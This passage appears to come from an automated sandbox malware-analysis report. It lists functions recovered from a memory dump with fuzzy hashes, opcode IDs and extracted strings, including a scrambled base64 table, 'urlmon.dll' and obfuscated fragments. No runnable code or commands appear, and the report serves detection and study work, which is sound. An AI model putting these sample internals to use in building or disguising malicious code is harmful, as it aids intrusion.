                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 898431935e2ac074351224030db56adf366957eb42f3f5aae6628c298ce47281
                            • Instruction ID: aa0c6cda3cff09d9bfeb3230ddedbc97c2a5ab5937cb9dce79f806c934f77ea0
                            • Opcode Fuzzy Hash: 898431935e2ac074351224030db56adf366957eb42f3f5aae6628c298ce47281
                            • Instruction Fuzzy Hash: 0F4112B1D11219AFDB04DF99CC81AEEBBBCFF49710F10455AFA14E6240D7B0A641CBA5
                            Function 038B26AA Relevance: .1, Instructions: 98COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f3e4ca8b32345b7715982c1e894d814639bfea704df124c5d7d303f5072b047
                            • Instruction ID: 30dc7f435c811a7581b1f18ae75f7aef5ca3ce9b7c947f422fd464992862a19a
                            • Opcode Fuzzy Hash: 3f3e4ca8b32345b7715982c1e894d814639bfea704df124c5d7d303f5072b047
                            • Instruction Fuzzy Hash: 4D31B4B5A00609AFCB14DF98D881EDEB7F9EF8C310F108259F919A7340D774A9518BA5
                            Function 038B280A Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction ID: 91f7c5e6cb9f48c81d3e8d9d516386929709e8ae554799a85a50bd1f1a2fb5c7
                            • Opcode Fuzzy Hash: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction Fuzzy Hash: AD31E9B5A00609AFCB14DF99D881EEEB7B9EF8C314F108149FD19A7340D770A951CBA5
                            Function 038B210A Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9bfeb708c218d627cb187a5f47cc6a035b22de17baa6bb2dba330b37780213c8
                            • Instruction ID: 8b97a84632064545296ff2805c612a7d8041b86a19eda7383f2a75e8827efe03
                            • Opcode Fuzzy Hash: 9bfeb708c218d627cb187a5f47cc6a035b22de17baa6bb2dba330b37780213c8
                            • Instruction Fuzzy Hash: 8021F9B5A00249AFDB14DF98DC81EEEB7B9EF88200F108559F909A7340D774A9528BA5
                            Function 038A23AA Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e8297be21352fbe1956b255911074e414e28e496c968dc3121ff864150a2acc
                            • Instruction ID: e38ec7c84838a3a4131264476271905a67218dfb6eebdae121725baea4be07e9
                            • Opcode Fuzzy Hash: 1e8297be21352fbe1956b255911074e414e28e496c968dc3121ff864150a2acc
                            • Instruction Fuzzy Hash: B71191B63803057AF320DE998C43FAB336CDB84B20F244444FB04EE2C1D6A5B80246B5
                            Function 038B2A1A Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae67a0096e8972e5a78593926e30141c038a86ca5a1e4f980804cd7758f47f4b
                            • Instruction ID: 138bf8af6266f1f548f7ac40917ca00c99a4acec6fa2c1af864604b09ddc6ae6
                            • Opcode Fuzzy Hash: ae67a0096e8972e5a78593926e30141c038a86ca5a1e4f980804cd7758f47f4b
                            • Instruction Fuzzy Hash: 7D211DB5A00709AFDB14DF98DC81EEF77B8EF89210F108549FD19A7340E770A9518BA5
                            Function 038AF32A Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b372eaaf302682725c6848ede50c9c798544719606eef5016eb5fe485f8747e
                            • Instruction ID: 7d8ad6b1d401acc8f0968564d7ed2f7362cb0b6f9226a79d646aba95b86be000
                            • Opcode Fuzzy Hash: 5b372eaaf302682725c6848ede50c9c798544719606eef5016eb5fe485f8747e
                            • Instruction Fuzzy Hash: F411DAB6D11219AF9B00DFE9D8409EEFBF9EF48210F14426AE919E7204E6715A14CBA1
                            Function 038B1F2A Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d099c63dfac3c76eb3c792116572c772a70f60b41a23d19bd7ae2ac96455f62a
                            • Instruction ID: 2809f36687f01bfde796c9c4f1b67f0c6448c36ea1311108ae3491721fde2d49
                            • Opcode Fuzzy Hash: d099c63dfac3c76eb3c792116572c772a70f60b41a23d19bd7ae2ac96455f62a
                            • Instruction Fuzzy Hash: 681191B56007446BD710EBA88C41FEBB7BCEF89210F108549FE19AB281E7706A4187A1
                            Function 038B1DCA Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d4cbaf482fbe795808a6681c3d68eb575982a357505b8a27e8c16631218d38e
                            • Instruction ID: b602f3415ca57a63639642146cd21037b388cebd88a64b568a40105ee24d350a
                            • Opcode Fuzzy Hash: 0d4cbaf482fbe795808a6681c3d68eb575982a357505b8a27e8c16631218d38e
                            • Instruction Fuzzy Hash: 8D1191756407046BD710EBA8CC41FEBB7BCEF89201F108549FE09AB340EAB0B94187A2
                            Function 038AB7BA Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 671b0bb9991dd35bb4b4c1e3a3bc0f812fb599f71e54b0ce412a9830d77564e8
                            • Instruction ID: 144bba0c7c9cacba58dbe5083045987e0719661c3e3a969dea9d2859b65d05f6
                            • Opcode Fuzzy Hash: 671b0bb9991dd35bb4b4c1e3a3bc0f812fb599f71e54b0ce412a9830d77564e8
                            • Instruction Fuzzy Hash: 7C01C4BAA002152BD714EA98DC46EEB736CDF44210F000791FD18DB241FA70AE514BE2
                            Function 038AFA1A Relevance: .1, Instructions: 58COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 249a8113b7f7400b2c7b5638429fc5dfac357ca41f81fbe948e7d3de540197f6
                            • Instruction ID: d6c04a38ecf9842847342d39fd29887cc92cb52412325f40986365c5abf3390d
                            • Opcode Fuzzy Hash: 249a8113b7f7400b2c7b5638429fc5dfac357ca41f81fbe948e7d3de540197f6
                            • Instruction Fuzzy Hash: 6011E6B6D11219AF9B40DFEDD9409EEFBF9EF48210F14456AE919F7200E7705A048BA1
                            Function 0388E9FB Relevance: .1, Instructions: 52COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53effe3b5adb85b4f7366131b63994b7c11d229ffdf60afcb3cbe1f90256dc75
                            • Instruction ID: 7ecc8830bc0d68f9109f3f9e6e473f05b8600ce5109a419494437576cb4b8847
                            • Opcode Fuzzy Hash: 53effe3b5adb85b4f7366131b63994b7c11d229ffdf60afcb3cbe1f90256dc75
                            • Instruction Fuzzy Hash: F61118B0C11229AFCB54DFAD88801DDBFF8FF09A20B10855BE858E7211D37186018FD0
                            Function 038B2D6A Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction ID: 8e1e2cd670883ee3f35e7c0b5a6b2f4607bb16c14915d4b0600a32d22aab011c
                            • Opcode Fuzzy Hash: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction Fuzzy Hash: 4501C4B6201609BFCB44DF89DC81EEB77ADEF8C710F108108FA09E7240D630E8518BA4
                            Function 0388EB5A Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 457267f689ae709420576e3c2ed7ea0155783dab4b3f625014d16e180db9c955
                            • Instruction ID: 7d57224d49db5c581cba8a66171370a9e2c3e90aa0ff9e42e513e8ef42f7b4ca
                            • Opcode Fuzzy Hash: 457267f689ae709420576e3c2ed7ea0155783dab4b3f625014d16e180db9c955
                            • Instruction Fuzzy Hash: 74F027736103162BD710AF9DAC40B86F7DCEB84230F240622F91CDB240E671E81182E0
                            Function 038B201A Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27c34b64a36c319753689fe31e8a416d15eb09920afed7623eb3b9fc2c63d13f
                            • Instruction ID: 0b88a179bc1cd77de8101c78d8b9b47f24f59d6f31a3c5d0d7422e67401d5c9c
                            • Opcode Fuzzy Hash: 27c34b64a36c319753689fe31e8a416d15eb09920afed7623eb3b9fc2c63d13f
                            • Instruction Fuzzy Hash: F3F0F876200609BBDA10EF99DC41EDB77ADEF89610F108509F919EB241DA70B9528BB1
                            Function 038A2566 Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 24f94dd29253332ec6dc0043c1e1fb28027a3fc250b28bf24d1e117f6bf48f7a
                            • Instruction ID: 849b6ff122bfc5d2ce66c1c24e5ddca98e35de7311184e612ae54b2d8b20028f
                            • Opcode Fuzzy Hash: 24f94dd29253332ec6dc0043c1e1fb28027a3fc250b28bf24d1e117f6bf48f7a
                            • Instruction Fuzzy Hash: E8F0A7A5D043097EEB20FAE8AC89EB672FDEB0C200F0045C5B909DB241E5709D944AA6
                            Function 038B2C8A Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction ID: f9f70af7ce86547870967b99c09b54a615d76df8a9ba2645e779b931381ded81
                            • Opcode Fuzzy Hash: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction Fuzzy Hash: 27E06D752002087BD614EE98DC41EDB77ACEFC8710F508059F909A7241D670B9118BB5
                            Function 038A24CA Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4a9ab2ace1666e9c287364a6deee2f926b4652e1058a4290791bef2b8197fbc
                            • Instruction ID: 03e1eb6be42e5fe500dff3f4c927833cfd0f6f6d1dba502cf5578cee64f580c8
                            • Opcode Fuzzy Hash: f4a9ab2ace1666e9c287364a6deee2f926b4652e1058a4290791bef2b8197fbc
                            • Instruction Fuzzy Hash: BCF0827180520DEBDB24CFA8D841BDDBBB8EB04320F1087AAE825DB2C0E7349750C781
                            Function 038B493A Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 508ffebd264a9cc3a4f900e8cb5139ae0d22c44b00566a843a8fc55bd48950ed
                            • Instruction ID: 31651e2c89fcc03af38509ad1b5f712c6c6d30d927848285814f49b9d0c3b198
                            • Opcode Fuzzy Hash: 508ffebd264a9cc3a4f900e8cb5139ae0d22c44b00566a843a8fc55bd48950ed
                            • Instruction Fuzzy Hash: E7E04F3670031527D22096DA9C06FE7B76CCFC5A60F1945A4FE0CDB341E665A90142E5
                            Function 038B298A Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction ID: 1ccd5927757fbca65a019eb32006192c6604879565c814426c900ee1e3971387
                            • Opcode Fuzzy Hash: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction Fuzzy Hash: E1E04F362012147BD620FA59DC01EDBBB6CDBC5610F108455FA0AAB241D6707A0287B1
                            Function 038956DC Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77705ef9ec14a1c40eac4b3ba025242317629986cd94bf418820a8540c54fdd4
                            • Instruction ID: 31e004ad3ce3da75aeefbe093b9f92fa70e530b1e24dd91e4df48f5b60997afa
                            • Opcode Fuzzy Hash: 77705ef9ec14a1c40eac4b3ba025242317629986cd94bf418820a8540c54fdd4
                            • Instruction Fuzzy Hash: 10C02B5D228285ADDB12B97CCDC1C0F7F00A98213430A03A9F4838E152D34088D50253

                            Non-executed Functions

                            Function 0389E72A Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                            • API String ID: 0-3248090998
                            • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                            • Instruction ID: b92f8b078f4dc81e24b45023d0f5dfc65f5eaae8f817770ce479e38413d18078
                            • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                            • Instruction Fuzzy Hash: 6491FFF08052A98ADB11CF55A4603DFBF71BB95204F1581E9C6AA7B243C3BE4E45DF90
                            Function 038AC46A Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                            • API String ID: 0-1002149817
                            • Opcode ID: 2701073c83a5de4e6158348b879e79077082ec5d70980cfabc2c37e3dc394da3
                            • Instruction ID: bddcbfea68681e8279f920d7d7305fff020af4d1449cf8023ab71f6b9d5777f4
                            • Opcode Fuzzy Hash: 2701073c83a5de4e6158348b879e79077082ec5d70980cfabc2c37e3dc394da3
                            • Instruction Fuzzy Hash: 8BC12EB1D003689EDF20DFA5CC45BEEBBB9AF45304F0081D9D548AB241E7B55A88CF92
                            Function 0388E70A Relevance: 31.3, Strings: 25, Instructions: 45COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: eam$#&7}$#dxa$1<"4$1<"4$5 ea$` m|$b#td$bk &$eamk$ecb#$eomx$i#m|$in| $ki#{$mki#$mxec$mzej$m||`$ta` $ta`7$xa`'$xitx$|`eo$}1<"
                            • API String ID: 0-225369145
                            • Opcode ID: e6d068e3598859c5edcee4310930af16b78b51712cdfb37d284be144f2b7f876
                            • Instruction ID: e955675b4beeadc4851ce975ad6e0c8a39f3ad4e8c2a9bfb7efcb78a756070f0
                            • Opcode Fuzzy Hash: e6d068e3598859c5edcee4310930af16b78b51712cdfb37d284be144f2b7f876
                            • Instruction Fuzzy Hash: A311CBB0C0535CAACB18CFDAD98269EBF76BB05750F208298E4146E255C7754A11CF99
                            Function 038A98EA Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                            • API String ID: 0-3236418099
                            • Opcode ID: 0e44db0e15b6e687de33643d37cfad3f292fc22d34059a25afbe1f0d6afc5941
                            • Instruction ID: 8f0497e2d80d0e8fb853c99675f8aa51df2a0eac901a5b703ba557296880b191
                            • Opcode Fuzzy Hash: 0e44db0e15b6e687de33643d37cfad3f292fc22d34059a25afbe1f0d6afc5941
                            • Instruction Fuzzy Hash: 0A9182B1900319AAEB10EF998C81FEEB7BDEF44704F0445E9E508EA141EB755B85CF62
                            Function 038A98DE Relevance: 25.1, Strings: 20, Instructions: 95COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                            • API String ID: 0-3236418099
                            • Opcode ID: 895f8c4f565ab861ea6cac65b43ab0179b8bb441aa9c2e13f19e87d8238ea334
                            • Instruction ID: 5538319f840534443dd25668b2434a582cf28890ed9d1af8b89af08d1a129247
                            • Opcode Fuzzy Hash: 895f8c4f565ab861ea6cac65b43ab0179b8bb441aa9c2e13f19e87d8238ea334
                            • Instruction Fuzzy Hash: 97410AB0C00358DEEB60DFA98885BEEBBB9FF04744F1041A9950CAB241DBB54B88CF55
                            Function 03894E23 Relevance: 22.6, Strings: 18, Instructions: 109COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *r$,$3e$A$A4$B?$D$F$Mh3e$O$O$Y$f$g&$h%$m$rp$t
                            • API String ID: 0-2370131731
                            • Opcode ID: 534d9a93c542c6b7f7cd7eaddba3e75d982d0f46e13e4300aaf3b7b4196a2e84
                            • Instruction ID: 5268e9dd2b47e38a67f89ae4b683cd487132ed7179406e9d3640219e4d474ccb
                            • Opcode Fuzzy Hash: 534d9a93c542c6b7f7cd7eaddba3e75d982d0f46e13e4300aaf3b7b4196a2e84
                            • Instruction Fuzzy Hash: D87159B0D05369CAEB61CF91C9587DEBBB1BB05308F1085D9C1583B281CBBA1A89CF95
                            Function 038A52DA Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                            • API String ID: 0-392141074
                            • Opcode ID: a0b0b154954d6cb41b2856810b3e1558d069ed580dfa8936ef6d1470b18c436c
                            • Instruction ID: d64634bd139aadd4fc2d02ac95956ef3a47848cd18a3a2e4d5e1d1fc5f368bb5
                            • Opcode Fuzzy Hash: a0b0b154954d6cb41b2856810b3e1558d069ed580dfa8936ef6d1470b18c436c
                            • Instruction Fuzzy Hash: FD7140B5D00318AADB25DF99CC81FEEB77DBF08700F044599E609AB241EB7167448F92
                            Function 038A52DC Relevance: 16.4, Strings: 13, Instructions: 170COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                            • API String ID: 0-392141074
                            • Opcode ID: 1d2db2ac0e2a27ca0a8830fd97376b6d3dd890a54b1c56a7f06b08f680d8857d
                            • Instruction ID: 4b52a663a72b5f932ec5daf3b7b79d08faf3b6de2195f66dc5b84a7ae1bfe00a
                            • Opcode Fuzzy Hash: 1d2db2ac0e2a27ca0a8830fd97376b6d3dd890a54b1c56a7f06b08f680d8857d
                            • Instruction Fuzzy Hash: C8613EB5D00318AAEB15DF99CC81FEEB67DBF18700F044599E609AB241EB7157488F62
                            Function 0388E7E0 Relevance: 16.3, Strings: 13, Instructions: 56COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;'>?$@D]@$@ZS2$C,BC$C@]B$C]AG$D]@E$ES[8$FFS $F]CS$S+SB$\GG]$s
                            • API String ID: 0-1634341979
                            • Opcode ID: 710850cd39adda7d883b0c7927163a346c2d556033e7cdeab9a38133f25bdf8c
                            • Instruction ID: bb1ee0f9775b5d2bb4ec9decea33208a0bcf576451b1e975265ae844ba76b0c4
                            • Opcode Fuzzy Hash: 710850cd39adda7d883b0c7927163a346c2d556033e7cdeab9a38133f25bdf8c
                            • Instruction Fuzzy Hash: 7C21ECB0C04288AFDF21DFE496802CEBFB1AB05310F608598C42A7F241D3B64656DF89
                            Function 0388E7EA Relevance: 16.3, Strings: 13, Instructions: 53COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;'>?$@D]@$@ZS2$C,BC$C@]B$C]AG$D]@E$ES[8$FFS $F]CS$S+SB$\GG]$s
                            • API String ID: 0-1634341979
                            • Opcode ID: 3852e79e17c48379d9ad5b2161431157d1c952dcb5cffdf614c41a5ee6ef4212
